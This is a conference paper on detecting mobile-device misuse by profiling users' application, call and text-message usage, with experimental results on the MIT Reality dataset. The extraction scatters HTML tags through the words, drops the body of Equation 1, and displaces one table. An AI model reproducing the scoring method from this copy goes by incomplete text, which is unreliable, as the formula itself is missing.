novel behaviour-based profil<strong>in</strong>g technique by us<strong>in</strong>g a mobile user’s application usage to detect abnormal mobile<br />
activities. The experiment employed the MIT Reality dataset. For data process<strong>in</strong>g purposes and also to maximise the<br />
number of participants, one month (24/10/2004-20/11/2004) of users’ application usage with a total number of 44,529<br />
log entries was extracted from the orig<strong>in</strong>al dataset. It was further divided to form three subsets: two <strong>in</strong>tra-application<br />
datasets compiled with telephone and message data; and an <strong>in</strong>ter-application dataset conta<strong>in</strong><strong>in</strong>g the rest of the<br />
mobile applications. Based upon the experiment plan, a user’s profile was built us<strong>in</strong>g either static and dynamic<br />
profiles and the best experimental results for the telephone, text message, and application-level applications were an<br />
EER (Equal Error Rate) of: 5.4%, 2.2% and 13.5% respectively. Whilst some users were difficult to classify, a<br />
significant proportion fell with<strong>in</strong> the performance expectations of a behavioural biometric and therefore a behaviour<br />
profil<strong>in</strong>g system on mobile devices is able to detect anomalies dur<strong>in</strong>g the use of the mobile device. Incorporated<br />
with<strong>in</strong> a wider authentication system, this biometric would enable transparent and cont<strong>in</strong>uous authentication of the<br />
user, thereby maximis<strong>in</strong>g user acceptance and security.<br />
Keywords: mobile device, behaviour profil<strong>in</strong>g, applications, transparent authentication<br />
1. Introduction<br />
The modern mobile handheld device is capable of provid<strong>in</strong>g many services through a wide range of<br />
applications over multiple networks as well as on the handheld itself, such as: voice call<strong>in</strong>g through<br />
service provider’s network, Internet surf<strong>in</strong>g via Wi-Fi hotspots, video conferenc<strong>in</strong>g through a 3G<br />
connection, road navigat<strong>in</strong>g by GPS (Global Position<strong>in</strong>g System), picture shar<strong>in</strong>g by us<strong>in</strong>g Bluetooth<br />
pair<strong>in</strong>g, data synchronis<strong>in</strong>g with laptop/desktop computers, document creation and modification, and<br />
enterta<strong>in</strong>ment (i.e. play<strong>in</strong>g music). Indeed, the functionality and <strong>in</strong>terconnectivity of mobile devices only<br />
tends to <strong>in</strong>crease with time.<br />
While people enjoy the convenience provided by mobile devices, there are also threats which could make<br />
their life less comfortable, such as the loss or theft of the device, service fraud, SIM (Subscriber Identity<br />
Module) card clon<strong>in</strong>g, mobile malware, <strong>in</strong>formation disclosure, DoS (Denial-of-Service) attacks, Smish<strong>in</strong>g<br />
(SMS (Short Message Service) phish<strong>in</strong>g) and Vish<strong>in</strong>g (Voice phish<strong>in</strong>g). Mobile malware could harm the<br />
mobile phone <strong>in</strong> a variety of ways, such as: <strong>in</strong>fect<strong>in</strong>g files and damag<strong>in</strong>g user data. S<strong>in</strong>ce discovered <strong>in</strong><br />
2004, there are more than 106 malware families with 514 variants hav<strong>in</strong>g been identified (Securelist<br />
2010). Smish<strong>in</strong>g and Vish<strong>in</strong>g are new types of phish<strong>in</strong>g attacks which are performed by utilis<strong>in</strong>g text<br />
messag<strong>in</strong>g and telephone calls (FBI 2010). If the phone owner is fooled, its personal <strong>in</strong>formation can be<br />
exposed and abused.<br />
With the aim to counter mobile threats, a number of security mechanisms have been developed both on<br />
the mobile device and the service provider’s network. The PIN (Personal Identification Number) based<br />
authentication method is the most widely deployed approach on mobile devices. Although widely used,<br />
many users do not employ the technique properly (i.e. never chang<strong>in</strong>g the PIN) (Clarke and Furnell 2005;<br />
Kurkovsky and Syta 2010). Mobile antivirus software and firewall applications are ma<strong>in</strong>ly deployed for<br />
detect<strong>in</strong>g malware presence and block<strong>in</strong>g unwanted network traffic. Nonetheless, obta<strong>in</strong><strong>in</strong>g the latest<br />
virus signatures and updat<strong>in</strong>g rules for network traffic are not easy tasks; furthermore, their ability to<br />
detect user related activities is limited. As a mobile device has limited comput<strong>in</strong>g power, more<br />
sophisticated mechanisms, such as IDS (Intrusion Detection System), are primarily deployed on the<br />
service provider’s network. These systems monitor the mobile users’ call<strong>in</strong>g and migration activities to<br />
detect telephony service fraud. However, given the modern mobile device has the ability to access<br />
307
Fudong Li et al.<br />
several networks simultaneously and accommodate a wide range of services, exist<strong>in</strong>g network-based<br />
security mechanisms are unable to provide comprehensive protection for the mobile handset. This paper<br />
focuses upon present<strong>in</strong>g the f<strong>in</strong>d<strong>in</strong>gs from a feasibility study <strong>in</strong>to utilis<strong>in</strong>g a host-based behavioural<br />
profil<strong>in</strong>g approach to identify mobile device misuse, and provid<strong>in</strong>g cont<strong>in</strong>ued and transparent protection<br />
for mobile devices.<br />
This paper beg<strong>in</strong>s by <strong>in</strong>troduc<strong>in</strong>g various mobile device applications, mobile threats, and general security<br />
mechanisms and cont<strong>in</strong>ues to describe the current state-of-the-art. A series of experimental studies on<br />
two aspects of user’s applications usage (application-level and application-specific) are presented <strong>in</strong><br />
Section 3, with the follow<strong>in</strong>g section describ<strong>in</strong>g the results. The paper then proceeds to discuss the<br />
results and conclude with highlight<strong>in</strong>g the future direction of the research.<br />
2. Behaviour-based mobile device security mechanisms<br />
Research <strong>in</strong> mobile device security has been an established area for more than 10 years with a<br />
substantial amount of activity focused upon the areas of authentication, antivirus, firewalls, and IDS. Of<br />
particular <strong>in</strong>terest however is the research that has been undertaken <strong>in</strong> behaviour-based mechanisms.<br />
This research falls primarily <strong>in</strong>to two categories: behaviour-based network and behaviour-based host<br />
mechanisms.<br />
2.1 Behaviour-based network mobile security mechanisms<br />
The research for study<strong>in</strong>g mobile behaviour-based mechanisms started around 1995 ma<strong>in</strong>ly focus<strong>in</strong>g<br />
upon the area of IDS. These mobile IDSs monitor user call<strong>in</strong>g and migration behaviour over the service<br />
provider’s network, and detect telephony service fraud (Gosset 1998; Samfat and Molva 1997;<br />
Boukerche and Nitare 2002). One particularly successful approach is based upon develop<strong>in</strong>g a profile of<br />
users call<strong>in</strong>g history over a period of time and compar<strong>in</strong>g this historical profile aga<strong>in</strong>st current usage, with<br />
deviations above a predef<strong>in</strong>ed threshold result<strong>in</strong>g <strong>in</strong> an alarm. Various supervised and unsupervised<br />
classifiers were successfully developed to deal with various attributes of the problem-space (known and<br />
unknown attack vectors) and the result<strong>in</strong>g systems were comb<strong>in</strong>ed so that the strengths of each<br />
approach can be capitalised upon (Gosset 1998).<br />
Research has also focused on the use of geo-location <strong>in</strong>formation as a basis for detect<strong>in</strong>g misuse. Based<br />
upon the hypothesis that people have a predictable travell<strong>in</strong>g pattern, the migration based mobile IDS<br />
monitors a user’s location activities to detect abnormal behaviour. The user’s location <strong>in</strong>formation can be<br />
obta<strong>in</strong>ed either from the mobile cellular network (i.e. cell ID) or via a GPS l<strong>in</strong>k (i.e. longitude, latitude). By<br />
record<strong>in</strong>g the users’ location <strong>in</strong>formation over a time period, a mobility profile can be generated. When a<br />
mobile user carries their device from one location to another, the probability of the event will be<br />
calculated. If this surpasses a threshold, then the current event will be considered as an <strong>in</strong>trusion. A<br />
number of studies have been carried out by profil<strong>in</strong>g user migration activities, such as: Buschkes et al<br />
1998, Hall et al 2005, and Sun et al 2006.<br />
By study<strong>in</strong>g a user’s call<strong>in</strong>g or location activities, behaviour based IDSs can achieve a high detection rate<br />
and offer the ability to detect unforeseen attacks. In addition, as the classification and identification<br />
procedures are processed by the network service provider, it does not require any additional<br />
computational power from the mobile device. This has traditionally been critical for mobile devices, as<br />
they have limited process<strong>in</strong>g power and space compar<strong>in</strong>g with traditional desktop computers.<br />
Nonetheless, if these behaviour-based systems work together to monitor the mobile user’s action (i.e.<br />
call<strong>in</strong>g a friend) while know<strong>in</strong>g where the action is taken (i.e. at home), an overall system performance<br />
could arguably be <strong>in</strong>creased.<br />
2.2 Behaviour-based host mobile security mechanisms<br />
Exist<strong>in</strong>g host behaviour-based mobile security systems are ma<strong>in</strong>ly authentication-based systems. These<br />
systems usually employ one or more characteristics of a user’s behaviour to assess the legitimacy of the<br />
current user – techniques <strong>in</strong>clude keystroke analysis and gait recognition.<br />
Keystroke analysis based authentication systems monitor users’ keystroke patterns, typically monitor<strong>in</strong>g<br />
the <strong>in</strong>ter-keystroke latency and hold-time. The authentication can be performed <strong>in</strong> two modes: static (text<br />
dependent) and dynamic (text <strong>in</strong>dependent). In the static mode, users will be authenticated when a<br />
specific word or phrase has been entered. For <strong>in</strong>stance, the system will authenticate the user when they<br />
enter a PIN to unlock their mobile devices. In the dynamic mode, a user’s legitimacy will be checked<br />
308
Fudong Li et al.<br />
based upon their typ<strong>in</strong>g speed and rhythm <strong>in</strong>dependent of what they type. For example, authentication<br />
will transparently occur while the user composes a text message. Previous work <strong>in</strong> this area <strong>in</strong>clude<br />
Clarke and Furnell (2006), Buchoux and Clarke (2008), and Campisi et al. (2009). With an average<br />
experimental EER of 13%, keystroke analysis based authentication systems can be deployed <strong>in</strong> practice<br />
to provide extra security for a mobile device. However, this method is only practical <strong>in</strong> scenarios with<br />
sufficient keystroke activity (i.e. activities such as read<strong>in</strong>g a document or view<strong>in</strong>g a picture would be<br />
unlikely to generate sufficient data to successfully validate a users’ identity).<br />
Gait recognition is based upon the theory that people can be discrim<strong>in</strong>ated by how people walk when<br />
they carry their mobile device (Boyd and Little, 2005). When a user carries their mobile device <strong>in</strong> their<br />
trouser pocket, the user’s gait <strong>in</strong>formation can be collected (Derawi et al 2010). The user’s gait data can<br />
then be compared with an exist<strong>in</strong>g template. If it matches, the user is considered legitimate; otherwise,<br />
they are an <strong>in</strong>truder. The experiment result shows that an EER of 20.1% can be achieved. It shows the<br />
possibility to deploy this method on a mobile handset. However, as the authentication process is heavily<br />
reliant on user’s gait <strong>in</strong>formation, this could leave the mobile device unprotected when gait <strong>in</strong>formation is<br />
not available – for example when the user sits <strong>in</strong> the office.<br />
2.3 Summary of current mobile behaviour security mechanisms<br />
The aforementioned literature suggests that exist<strong>in</strong>g behaviour-based network IDSs can detect call<strong>in</strong>g<br />
service fraud attacks. However, <strong>in</strong> practice it can be seen that the mobile network operator can only<br />
monitor call<strong>in</strong>g and migration behaviours, rather than exam<strong>in</strong><strong>in</strong>g every s<strong>in</strong>gle mobile service. For the<br />
exist<strong>in</strong>g host-based behaviour authentication system, it could only provide periodically security when the<br />
user <strong>in</strong>teracts with the device <strong>in</strong> the desired manner (e.g. when the keypad is touched or the device is<br />
carried <strong>in</strong> the back pocket). Therefore, none of the current research <strong>in</strong> mobile behaviour security<br />
mechanisms provides a comprehensive and cont<strong>in</strong>uous protection aga<strong>in</strong>st device misuse. Hence, a<br />
mobile security mechanism which can offer detection across a wider range of services and connections<br />
on the mobile device is needed.<br />
3. Behaviour profil<strong>in</strong>g for transparent authentication for mobile devices<br />
The previous section shows that the network-based behavioural security mechanisms can only monitor<br />
network-based services through the service provider’s network. As current mobile devices have the<br />
ability to access multiple networks simultaneously, a host based approach must be taken <strong>in</strong>to<br />
consideration when design<strong>in</strong>g the new system. With the difficulty of obta<strong>in</strong><strong>in</strong>g and updat<strong>in</strong>g the signatures<br />
and the lack of the ability to detect unforeseen threats, a behaviour profil<strong>in</strong>g technique should be taken.<br />
As application usage represents an overview of how the user <strong>in</strong>teracts with the device (Miett<strong>in</strong>en et al<br />
2006), and due to the lack of research regard<strong>in</strong>g the discrim<strong>in</strong>atory nature of application usage with<strong>in</strong> a<br />
mobile device environment, an experiment was developed focuss<strong>in</strong>g upon two aspects: application-level<br />
and application-specific user <strong>in</strong>teractions.<br />
3.1 Experiment procedure<br />
The experiment employed a publicly available dataset provided by the MIT Reality M<strong>in</strong><strong>in</strong>g project (Eagle<br />
et al 2009). The dataset conta<strong>in</strong>s 106 participants’ mobile phone activities from September 2004 to June<br />
2005. By us<strong>in</strong>g pre<strong>in</strong>stalled logg<strong>in</strong>g software, various mobile data attributes were collected from<br />
participants’ us<strong>in</strong>g Nokia 6600 mobile phones. As shown <strong>in</strong> Table 1, the MIT Reality dataset conta<strong>in</strong>s a<br />
large and varied selection of <strong>in</strong>formation which covers two levels of application usage: application-level<br />
<strong>in</strong>formation (general applications) and application-specific <strong>in</strong>formation (voice call and Text message).<br />
Table 1: The MIT Reality dataset<br />
Activity Number of logs Information conta<strong>in</strong>s<br />
General applications 662,393 Application name, date, time of usage and cell ID<br />
Voice call 54,440 Date, time, number of call<strong>in</strong>g, duration and cell ID<br />
Text message 5,607 Date, time, number of text<strong>in</strong>g and cell ID<br />
3.1.1 Application-level analysis<br />
By default, a number of common applications are pre<strong>in</strong>stalled on the mobile device by the manufacture,<br />
such as: phonebook, clock and voice call<strong>in</strong>g. With <strong>in</strong>creased comput<strong>in</strong>g process<strong>in</strong>g power and storage<br />
space and almost 15,000 new mobile applications becom<strong>in</strong>g available on the market every month, mobile<br />
309
Fudong Li et al.<br />
users have the freedom of <strong>in</strong>stall<strong>in</strong>g any additional applications on the device (Distimo 2010). From a<br />
high-level perspective the general use of applications can provide a basic level of <strong>in</strong>formation on how the<br />
mobile user utilises the device. Such basic <strong>in</strong>formation could be the name of the application, time, and<br />
location of usage. Given the hypothesis that mobile users utilise their mobile applications differently (i.e.<br />
two users utilise different applications <strong>in</strong> different time periods and at different locations), an experiment<br />
was devised to explore the possibility of utilis<strong>in</strong>g application-level <strong>in</strong>formation for discrim<strong>in</strong>at<strong>in</strong>g mobile<br />
device users.<br />
3.1.2 Application-specific analysis<br />
The second experiment focussed upon utilis<strong>in</strong>g further <strong>in</strong>formation about the applications. With<strong>in</strong> many<br />
applications the user connects to data that could provide additional discrim<strong>in</strong>atory <strong>in</strong>formation. For<br />
<strong>in</strong>stance, when surf<strong>in</strong>g the Internet, the Internet browser can capture all the URLs an <strong>in</strong>dividual accesses.<br />
Unfortunately, due to limitations on the dataset (collected prior to data-based applications becom<strong>in</strong>g<br />
prevalent), the range of application-specific analysis that could be undertaken were limited to telephony<br />
and text messag<strong>in</strong>g.<br />
The prior literature shows that call<strong>in</strong>g behaviour has been studied several times <strong>in</strong> a network-based<br />
environment with results demonstrat<strong>in</strong>g the ability to discrim<strong>in</strong>ate mobile phone users. With<strong>in</strong> a mobile<br />
host environment, the availability of call<strong>in</strong>g features does change slightly – for example, the IMSI<br />
(International Mobile Subscriber Identity) is not a useful feature <strong>in</strong> a host-based solution. Furthermore,<br />
although several studies suggested utilis<strong>in</strong>g a user’s location <strong>in</strong>formation, it was never been treated as a<br />
call<strong>in</strong>g feature. Therefore, it was <strong>in</strong>terest<strong>in</strong>g to identify the effectiveness of a new set of call<strong>in</strong>g features,<br />
which <strong>in</strong>cluded the user’s location <strong>in</strong>formation.<br />
Due to the enormous use of text messag<strong>in</strong>g, with the UK alone send<strong>in</strong>g more than 100 billion text<br />
messages <strong>in</strong> 2010 (Ofcom 2010), the application is amongst the most widely used application on a<br />
mobile device. Despite the high volume of text message usage, little research has been undertaken to<br />
show how text messages may be used to detect abnormal usage <strong>in</strong> the mobile environment. Hence, it<br />
was also deemed important to discover the possibility and usefulness of employ<strong>in</strong>g text messag<strong>in</strong>g to<br />
detect anomalous mobile user’s behaviours.<br />
For methodological reasons: to maximise the number of participants with<strong>in</strong> a reasonable timeframe, the<br />
experiment employed 76 participants whose activities occurred dur<strong>in</strong>g the period of 24/10/2004-<br />
20/11/2004. As not all participants started or f<strong>in</strong>ished the experiment at the same time, it was imperative<br />
to isolate a sub-section of the dataset that maximised the number of participants and available data. The<br />
methodology employed two types of profile techniques: static and dynamic. For the static profil<strong>in</strong>g, each<br />
<strong>in</strong>dividual dataset was divided <strong>in</strong>to two halves: the first half was used for build<strong>in</strong>g the profile, and the<br />
other half was utilised for test<strong>in</strong>g. For the dynamic profil<strong>in</strong>g, the profile conta<strong>in</strong>ed 7/10/14 days of the<br />
user’s most recent activities; the evaluation process was carried out on the same sub-dataset as for the<br />
static experiment <strong>in</strong> order to provide a mean<strong>in</strong>gful comparison. Given the highly variable nature of the<br />
<strong>in</strong>put data a smooth<strong>in</strong>g function was applied. Rather than tak<strong>in</strong>g each <strong>in</strong>dividual result, the smooth<strong>in</strong>g<br />
function permitted the system to make a decision after a number of results were present (similar to a<br />
w<strong>in</strong>ner-takes-all decision-based biometric fusion model). The basis for this approach was derived from<br />
the descriptive statistics produced when analys<strong>in</strong>g the data and the large variances observed. A dynamic<br />
approach therefore seemed sensible to cope with the chang<strong>in</strong>g nature of the profile. Based on the<br />
premise that the historical profile can be used to predict the probability of a current event, the follow<strong>in</strong>g<br />
formula illustrated <strong>in</strong> Equation 1 was devised. The equation also <strong>in</strong>cludes a weight<strong>in</strong>g factor to allow for<br />
more discrim<strong>in</strong>ative features to have a greater contribution (Wi) with<strong>in</strong> the result<strong>in</strong>g score than less<br />
discrim<strong>in</strong>ative features. Moreover, the equation also provides a mechanism to ensure all outputs are<br />
bounded between 0 and 1 to assist <strong>in</strong> def<strong>in</strong><strong>in</strong>g an appropriate threshold.<br />
Where:<br />
Equation 1: Alarm if: ≥threshold<br />
i=The features of one chosen application (i.e. dialled number for telephony application)<br />
310
Fudong Li et al.<br />
x=The value of Featurei (i.e. office telephone number and home telephone number)<br />
M=Total number of values for Featurei<br />
N=Total number of features<br />
Wi=The weight<strong>in</strong>g factor associated with Featurei ( )<br />
Threshold= A predef<strong>in</strong>ed value accord<strong>in</strong>g to each <strong>in</strong>dividual user<br />
4. Experimental results<br />
4.1 Application-level profil<strong>in</strong>g<br />
For the general applications, the follow<strong>in</strong>g features were extracted from the dataset: application name,<br />
date of <strong>in</strong>itiation, and location of usage. As a total of 101 <strong>in</strong>dividual applications were used among the<br />
chosen 76 users dur<strong>in</strong>g the chosen period, a f<strong>in</strong>al sub-dataset for application-level applications with<br />
30,428 entry logs was formed. Among these 101 applications, the phonebook, call logs and camera were<br />
used by all participants. By us<strong>in</strong>g the proposed mathematical equation, a f<strong>in</strong>al set of EER’s (Equal Error<br />
Rate) for users’ application-level usage is presented <strong>in</strong> Table 2. The best EER is 13.5% and it was<br />
obta<strong>in</strong>ed by us<strong>in</strong>g the dynamic profile technique with 14 days of user activity with 6 log entries. In<br />
comparison, the worst performance was achieved by us<strong>in</strong>g the dynamic profile technique with 7 days of<br />
user activities with 1 log entry.<br />
Table 2: Experimental results for application-level applications<br />
Profile<br />
technique<br />
Number of log entries<br />
1 2 3 4 5 6<br />
Static 14 days 21.1% 17.4% 16.3% 14.9% 14.2% 13.6%<br />
Dynamic 14 days 21.1% 17.3% 16.0% 14.5% 13.9% 13.5%<br />
Dynamic 10 days 22.1% 17.8% 16.2% 14.6% 14.4% 13.7%<br />
Dynamic 7 days 24.0% 19.4% 17.6% 15.9% 15.3% 14.4%<br />
Selected experimental results for the best configuration of application-level usage are shown <strong>in</strong> Table 3.<br />
The top 3 and bottom 3 users’ EERs represent the best and worst performance respectively. Further<br />
analyses of the results show that 84% of all users have an EER less than 20%.<br />
Table 3: Selected users’ performance for application-level applications with dynamic 14 days and 6 log<br />
entries<br />
4.2 Application-specific profil<strong>in</strong>g<br />
4.2.1 Telephony<br />
User_ID EER<br />
71 0%<br />
46 0%<br />
12 0.5%<br />
66 37.5%<br />
2 39.3%<br />
68 51.6%%<br />
For the telephone call application, a subset of 71 users from the 76 participants used the application<br />
dur<strong>in</strong>g the aforementioned chosen period. Dur<strong>in</strong>g the same period, 2,317 unique telephone numbers<br />
were dialled and the total number of calls made was 13,719. From iteration and optimisation, the<br />
follow<strong>in</strong>g features were chosen for each log: the telephone number, date and location of call. By us<strong>in</strong>g<br />
the aforementioned mathematical formula with the selected features (all features were given the same<br />
weight<strong>in</strong>g factor), a f<strong>in</strong>al set of experiment results is shown <strong>in</strong> Table 4. The best result is an EER of 5.4%<br />
and it was achieved by us<strong>in</strong>g the dynamic profile technique with user’s most recent 14 days activity and 6<br />
log entries.<br />
311
Fudong Li et al.<br />
Table 4: Experimental results for telephone call application<br />
Profile technique<br />
Number of log entries<br />
1 2 3 4 5 6<br />
Static 14 days 9.6% 9.1% 7.9% 7.2% 4.3% 6.4%<br />
Dynamic 14 days 8.8% 8.1% 6.4% 6.4% 6.3% 5.4%<br />
Dynamic 10 days 9.6% 8.6% 8.1% 7.2% 6.9% 6.0%<br />
Dynamic 7 days 10.4% 8.8% 8.5% 7.3% 7.0% 6.2%<br />
A selection of experimental results for the best set up of the telephone call application is presented <strong>in</strong><br />
Table 5. The best and worst performances for selected users are the top 3 and bottom 3 users<br />
accord<strong>in</strong>gly. Furthermore, 81.7% of users have an EER less than 10%.<br />
Table 5: Selected users’ performance for telephone call application with Dynamic 14 days and 6 log<br />
entries<br />
User_ID Performance<br />
23 0%<br />
43 0%<br />
61 0%<br />
64 20.6%<br />
50 23.1%<br />
8 39.5%<br />
4.2.2 Text messag<strong>in</strong>g<br />
For the text messag<strong>in</strong>g experiment, 22 users’ text messag<strong>in</strong>g activities were available from the 76<br />
participants, dur<strong>in</strong>g the chosen period. The text messag<strong>in</strong>g dataset conta<strong>in</strong>s 1,382 logs and 258 unique<br />
text<strong>in</strong>g numbers. For each text log, the follow<strong>in</strong>g features were extracted: receiver’s telephone number,<br />
date and location of text<strong>in</strong>g. Due to certa<strong>in</strong> participants hav<strong>in</strong>g limited numbers of text messag<strong>in</strong>g logs; a<br />
maximum of 3 log entries were treated as one <strong>in</strong>cident. By employ<strong>in</strong>g the aforementioned mathematical<br />
formula and all text message’s features (all features were given the same weight<strong>in</strong>g factor), the f<strong>in</strong>al<br />
result for user’s text messag<strong>in</strong>g application is shown <strong>in</strong> Table 6. The best result was an EER of 2.2% and<br />
it was acquired by utilis<strong>in</strong>g the dynamic profile method with 14 days of user’s activities and 3 log entries.<br />
Also, the performance improves considerably from 1 log entry to 2 log entries across all profil<strong>in</strong>g<br />
techniques.<br />
Table 6: Experimental results for text messag<strong>in</strong>g application<br />
Number of log entries<br />
1 2 3<br />
Profile technique<br />
Static 14 days 7.0% 4.3% 3.6%<br />
Dynamic 14 days 5.7% 2.6% 2.2%<br />
Dynamic 10 days 8.3% 4.1% 3.7%<br />
Dynamic 7 days 10.7% 5.7% 3.8%<br />
Table 7 shows a group of users’ performance for the best configuration of the text messag<strong>in</strong>g application.<br />
The top 3 and bottom 3 users’ EERs represent the best and worst performance respectively. In addition,<br />
95.5% of all users have an EER smaller than 10%.<br />
Table 7: Selected users’ performance for text messag<strong>in</strong>g application with Dynamic 14 days and 6 log<br />
entries<br />
User_ID Performance<br />
13 0%<br />
14 0%<br />
18 0.2%<br />
4 5.3%<br />
2 8.4%<br />
17 13.1%<br />
312
5. Discussion<br />
Fudong Li et al.<br />
The application name and location have proved valuable features that can provide sufficient<br />
discrim<strong>in</strong>atory <strong>in</strong>formation to prove useful <strong>in</strong> authentication. However, whilst this might identify many<br />
misuse scenarios, it would not necessary identify all cases of misuse – particular those where a<br />
colleague might temporarily misuse your device as the location <strong>in</strong>formation is likely to fall with<strong>in</strong> the same<br />
profile as the authorised user. So care is required <strong>in</strong> <strong>in</strong>terrupt<strong>in</strong>g these results. The <strong>in</strong>tra-application<br />
approach should also help to specifically identify this type of misuse.<br />
In general, dynamic profil<strong>in</strong>g achieved a slightly better performance than the static profil<strong>in</strong>g did. This is<br />
reasonable as a dynamic profile conta<strong>in</strong>s a user’s most recent activities; hence it obta<strong>in</strong>s a more accurate<br />
detection. Furthermore, with a longer tra<strong>in</strong><strong>in</strong>g set period, the performance is also improved. Hence, an<br />
<strong>in</strong>creased number of days (i.e. 18/22 days) of user activities as the tra<strong>in</strong><strong>in</strong>g set should be exam<strong>in</strong>ed to<br />
f<strong>in</strong>d the optimum solution. Nonetheless, literature suggests users do change their usage pattern over a<br />
long period of. A study by Flurry (2009) states that users only keep 67% of the applications over a 30<br />
days period. Moreover, storage and process<strong>in</strong>g issues should also be taken <strong>in</strong>to consideration with larger<br />
tra<strong>in</strong><strong>in</strong>g. While a smooth<strong>in</strong>g function treated more log entries as one <strong>in</strong>cident, the performance also<br />
improved accord<strong>in</strong>gly. The smooth<strong>in</strong>g function reduces the impact any s<strong>in</strong>gle event might have and<br />
seeks to take a more holistic approach to monitor<strong>in</strong>g for misuse. The disadvantage of this approach is<br />
that it takes a longer time for the system to make a decision; hence, an <strong>in</strong>truder could have more<br />
opportunities to abuse a system and a certa<strong>in</strong> amount of abuse could be missed by the security control.<br />
Limitations <strong>in</strong> the dataset are also likely to have created certa<strong>in</strong> difficulties. As the dataset was collected<br />
<strong>in</strong> 2004, the number of mobile applications available for users to choose was limited; this resulted <strong>in</strong> a<br />
large similarity of application-level application usage between mobile users and difficulty for any<br />
classification methods. In contrast, <strong>in</strong> the early part of 2010, there were around 200,000 mobile<br />
applications available (Distimo 2010). As mobile users have more options, their application-level usage<br />
would arguably differ larger. Therefore, it would be easier to discrim<strong>in</strong>ate mobile users through their<br />
application-level usage.<br />
As shown by Table 4, the performance of the telephony application is very good – more than twice that of<br />
the application-level profil<strong>in</strong>g. This re<strong>in</strong>forces the hypothesis that know<strong>in</strong>g both the application and what<br />
the user does with it, improves the chance of identify<strong>in</strong>g <strong>in</strong>dividual users significantly. Moreover, mobile<br />
users had a far larger set of telephone contacts (the numbers they can dial) compared with the number of<br />
applications they had also makes the classification process easier because there are more identifiable<br />
data po<strong>in</strong>ts from which to discrim<strong>in</strong>ate. In comparison with other biometric authentication techniques such<br />
as keystroke analysis, which has an average EER of 8%, the telephone experiment is with<strong>in</strong> that<br />
category of performance (Clarke and Furnell 2006).<br />
As presented <strong>in</strong> Table 6, the results from the text messag<strong>in</strong>g application were even better than those<br />
achieved by the telephone call application, albeit with a smaller dataset. This may be caused by people<br />
only send<strong>in</strong>g text messages to very close contacts. Although only 30% of the participants used the text<br />
messag<strong>in</strong>g application <strong>in</strong> 2004, the situation has changed considerably: for UK alone, the volume of text<br />
messag<strong>in</strong>g traffic has <strong>in</strong>creased by 290% s<strong>in</strong>ce 2004 (Ofcom 2010). This <strong>in</strong>dicates that the text<br />
messag<strong>in</strong>g based authentication method could serve a good proportion of the mobile users’ population.<br />
From the results presented <strong>in</strong> this paper, it can be shown that both application-level and applicationspecific<br />
<strong>in</strong>formation can be used to authenticate mobile users. In addition, although it is more difficult to<br />
profile certa<strong>in</strong> users, more than 81% of all users’ performance was with<strong>in</strong> the bounds of a behaviourbased<br />
biometric. Dynamic-based profil<strong>in</strong>g technique provides the opportunity to develop a more<br />
mean<strong>in</strong>gful profile of user activities. This does however raise issues with regards to template ag<strong>in</strong>g and<br />
ensur<strong>in</strong>g the samples utilised <strong>in</strong> creat<strong>in</strong>g the template are all legitimate that will need to be addressed.<br />
Furthermore, <strong>in</strong> comparison with previous research, which used computationally complicated neural<br />
networks as the classification method (Li et al 2009; Li et al 2010), this approach employed a light weight<br />
mathematical formula which saves a significant amount of process<strong>in</strong>g power and storage space; this is<br />
essential for handheld mobile devices as they have limited process<strong>in</strong>g power and storage space.<br />
6. Conclusions<br />
The experiment shows that with an EER of 5.4%, 2.2% and 13.5% for the telephony, text messag<strong>in</strong>g and<br />
general application usage respectively, and these techniques are viable for a behaviour-based<br />
313
Fudong Li et al.<br />
authentication mechanism with<strong>in</strong> the mobile environment. The authentication process could be carried <strong>in</strong><br />
the background while mobile users utilise their applications; if several abnormal activities occurred with<strong>in</strong><br />
a fixed time frame, further security methods would be <strong>in</strong>itiated accord<strong>in</strong>g to the level of the <strong>in</strong>cident.<br />
Future work will focus upon design<strong>in</strong>g an authentication architecture that could accommodate the<br />
aforementioned behaviour based authentication techniques. As the architecture works beh<strong>in</strong>d the scene,<br />
little attention would be required from the mobile user and an <strong>in</strong>tervention would only be needed when<br />
anomalous application usage occurs. Hence, such an architecture would provide a transparent and<br />
cont<strong>in</strong>uous protection for users. Furthermore, an operational system, which supports identity verification,<br />
will be developed for the purpose of evaluation.<br />
References<br />
Boukerche, A. and Nitare, M.S.M.A. (2002) “Behavior-Based Intrusion Detection <strong>in</strong> Mobile Phone Systems”, Journal<br />
of Parallel and Distributed Comput<strong>in</strong>g, vol. 62, Issue 9, pp. 1476-1490, <strong>Academic</strong> Press, Inc. Orlando, FL, USA<br />
Boyd, J.E., and Little, J.J. (2005) “Biometric gait recognition”, Advanced Studies <strong>in</strong> Biometrics: Summer School on<br />
Biometrics, pp19-42, 2005, LCNS<br />
Buchoux A, Clarke NL (2008) Deployment of Keystroke Analysis on a Smartphone, Proceed<strong>in</strong>gs of the 6th Australian<br />
Information <strong>Security</strong> & Management Conference, 1-3 December, Perth, Australia<br />
Buschkes, R., Kesdogan, D. and Reichl, P. (1998) “How to <strong>in</strong>crease security <strong>in</strong> mobile networks by anomaly<br />
detection”, Proceed<strong>in</strong>gs of the 14th Annual Computer <strong>Security</strong> Applications Conference, pp. 3-12. IEEE<br />
Computer Society, Wash<strong>in</strong>gton, DC, USA<br />
Campisi, P., Maiorana, E., Bosco, M.L., Neri, A. (2009) "User authentication us<strong>in</strong>g keystroke dynamics for cellular<br />
phones", IET Signal Process<strong>in</strong>g, Vol.3 No.4 pp333-41<br />
Clarke, N.L. and Furnell, S.M. (2005) “Authentication of users on Mobile Telephones – A Survey of Attitudes and<br />
Practices”, Computer & <strong>Security</strong>, 24(7), pp.519-527<br />
Clarke, N.L. and Furnell, S.M. (2006) “Authenticat<strong>in</strong>g Mobile Phone Users Us<strong>in</strong>g Keystroke Analysis”, International<br />
Journal of Information <strong>Security</strong>, ISSN:1615-5262, pp.1-14<br />
Derawi, M.O., Nickel, C., Bours, P., and Busch, C. (2010) "Unobtrusive User-Authentication on Mobile<br />
Phones Us<strong>in</strong>g Biometric Gait Recognition," Sixth International Conference on Intelligent Information<br />
Hid<strong>in</strong>g and Multimedia Signal Process<strong>in</strong>g, 2010<br />
Distimo, (2010) “Our Presentation From Mobile World Congres 2010 – Mobile Application Stores State Of Play”,<br />
[onl<strong>in</strong>e], http://blog.distimo.com/2010_02_our-presentation-from-mobile-world-congres-2010-mobile-applicationstores-state-of-play/,<br />
date accessed: 17 January 2011Eagle, N., Pentland, A. and Lazer, D. (2009) “Inferr<strong>in</strong>g<br />
Social Network Structure us<strong>in</strong>g Mobile Phone Data”, Proceed<strong>in</strong>gs of the National Academy of Sciences<br />
(PNAS), vol 106, pp.15274-15278.<br />
